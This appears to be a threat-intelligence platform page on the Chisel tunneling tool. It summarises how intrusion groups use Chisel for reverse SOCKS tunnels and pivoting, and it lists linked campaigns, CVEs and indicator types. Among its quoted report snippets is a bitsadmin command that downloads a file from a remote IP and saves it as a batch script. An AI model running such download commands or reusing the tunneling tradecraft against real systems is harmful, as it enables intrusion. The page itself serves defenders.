Chisel is an open-source tunneling utility written in Go that implements client-server TCP transport and reverse tunneling, commonly including SOCKS5 proxying over HTTP, WebSocket, or related channels. Although it is a legitimate administrative and red-team tool, it is frequently repurposed by intrusion operators to maintain covert connectivity, pivot into internal networks, and bypass segmentation or host-based monitoring.
In intrusion activity, Chisel is typically deployed after initial compromise as post-exploitation infrastructure rather than as a primary payload. Operators use it to create reverse tunnels from victim systems back to attacker-controlled servers, exposing internal services or establishing SOCKS proxies for interactive access, lateral movement, and follow-on tooling. It is often renamed or repackaged to blend with legitimate software, and customized builds or wrappers have been observed. Chisel has appeared in ransomware, espionage, and financially motivated operations, including activity associated with PYSA, MuddyWater, Operation Escaneo, Twelve, UAT-9686, and other hands-on-keyboard intrusions. It has also been used alongside web shells, Sliver, Cobalt Strike, Ligolo-ng, PsExec, WMIExec, SMBExec, Mimikatz, and credential-dumping workflows.
Observed deployments span Windows and Linux environments, with use cases including reverse SOCKS tunnels, layered persistence, network pivoting, and concealed command-and-control transport. In some campaigns, Chisel was staged through phishing-driven compromise chains or delivered after exploitation of perimeter systems such as Exchange, VPN appliances, web servers, or email security devices. Its recurring role across incidents is to provide resilient network-level access that supports broader objectives such as reconnaissance, credential theft, lateral movement, data exfiltration, and ransomware deployment.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Some of the tools we saw used in post-compromise activity in those impacted since March 2 include: ... Chisel
Some of the tools we saw used in post-compromise activity in those impacted since March 2 include: ... Chisel
CVE-2025-20393 (CVSS skóre 10,0) Kritická zero-day zraniteľnosť zariadení Cisco SEG a Cisco SEWM je aktívna, keď má zariadenie povolenú a do internetu vystavenú funkcionalitu Spam Quarantine. Zraniteľnosť sa nachádza v operačnom systéme Cisco AsyncOS a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie systémových príkazov s oprávneniami root. Zraniteľnosť je aktívne zneužívaná minimálne od konca novembra 2025. | ...AquaTunnel a TPC/UDP Chisel a nástroja pre čistenie logov AquaPurge.
The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781.
16 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Tooling including proprietary reconnaissance engine Kimera; a "curated exploit armory" targeting popular perimeter devices such as those from Fortinet, Ivanti, and Cisco; portable lateral movement toolkits; and "layered command-and-control infrastructure using Neo-reGeorg webshells, Chisel reverse tunnels, and compromised Cisco routers with persistent GRE tunnels," researchers said.
Tooling including proprietary reconnaissance engine Kimera; a "curated exploit armory" targeting popular perimeter devices such as those from Fortinet, Ivanti, and Cisco; portable lateral movement toolkits; and "layered command-and-control infrastructure using Neo-reGeorg webshells, Chisel reverse tunnels, and compromised Cisco routers with persistent GRE tunnels," researchers said.
The tools frequently used by the group include Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.
Among the tunneling tools MuddyWater attackers were observed using are Chisel, SSF and Ligolo... In this case, the “SharpChisel.exe” client runs on the victim machine, connects back to the Chisel server over port 8080...
20 distinct techniques documented for this family, organized by ATT&CK tactic.
The use of Cobalt Strike and related beacons were also observed for C2. An interesting observation of a tool used for maintaining access was the use of Chisel, a TCP/UDP tunneling tool written in Golang.
Command and Control T1071.001 Application Layer Protocol: Web Protocols ... using POST request /api/v2/ajax
SSH Dynamic Port Forwarding (SOCKS Proxy)... You then configure proxychains... the traffic will be seamlessly tunneled through the SSH connection into the internal network.
they set up a reverse SOCKS proxy, a renamed copy of the Chisel tunneling tool disguised as chrome.exe, and a Cloudflare Tunnel client
Some of the tools we saw used in post-compromise activity in those impacted since March 2 include: ... Stowaway multi-hop proxy tool
Lorenz set up a SOCKS proxy via Chisel on the Mitel device.
bitsadmin from a remote host: "CSIDL_SYSTEM\bitsadmin.exe" /rawreturn /transfer getfile http://89.34.111.11/3.avi CSIDL_PROFILE\public\2.bat
35 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
61 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Reverse tunneling utility used to establish SOCKS-based remote network access during the intrusion.
Legitimate tunneling tool that the content says was customized by attackers to support malicious operations.
A tunneling utility used by the attackers, renamed to masquerade as Chrome and provide redundant access channels in the compromised environment.
A tunneling utility used for reverse tunnels to maintain attacker connectivity and evade detection by blending with normal traffic.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.